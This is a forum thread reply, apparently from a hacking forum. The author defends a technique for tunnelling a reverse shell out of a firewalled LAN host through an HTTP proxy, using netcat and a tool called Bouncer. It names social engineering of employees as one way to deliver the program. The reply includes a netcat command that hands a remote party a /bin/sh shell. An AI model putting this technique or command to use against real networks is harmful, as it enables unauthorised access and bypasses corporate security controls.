Originally posted here by PuReExcTacy

If you can already do this, then what exactly are you gaining? You've already got shell access. Hell, from here, you can install whatever you want. And whatever remote admin tool you'd like.
But what if the victim's machine (10.0.4.15) is on a LAN and has no full Internet access except access to a single HTTP proxy server (10.0.0.4) for web browsing?

It's impossible to run a trojan/backdoor on the victim's machine and expect to connect or even reach the victim's machine from outside the LAN.

This method is for a hacker who already has physical access to the firewalled host, e.g. an employee of a company who wants access to his work workstation from home, OR a hacker who fools an employee of the company into downloading and executing a program that is programmed to automatically carry out steps 2 & 3.

Originally posted here by PuReExcTacy

At that, I wouldn't set netcat to listen on my own box. That's just an invitation for someone else to check out your box.
Eh? The netcat running on the attacker's host? That only opens port 443 and waits for someone to connect to the port. Not serving any data.

Originally posted here by fl34bit3
Thanks for the info. It shows though that it is a Win XP computer; is it only for XP or possible on others?
This method will work on Windows 2000 but not on the Windows 9x series.

I did try it on a Linux host but the Linux port of Bouncer gave me a "Segmentation Fault" error.
But in theory, it should work on Linux if you do this instead for Step 3:
Code:
./nc -e /bin/sh 127.0.0.1 9999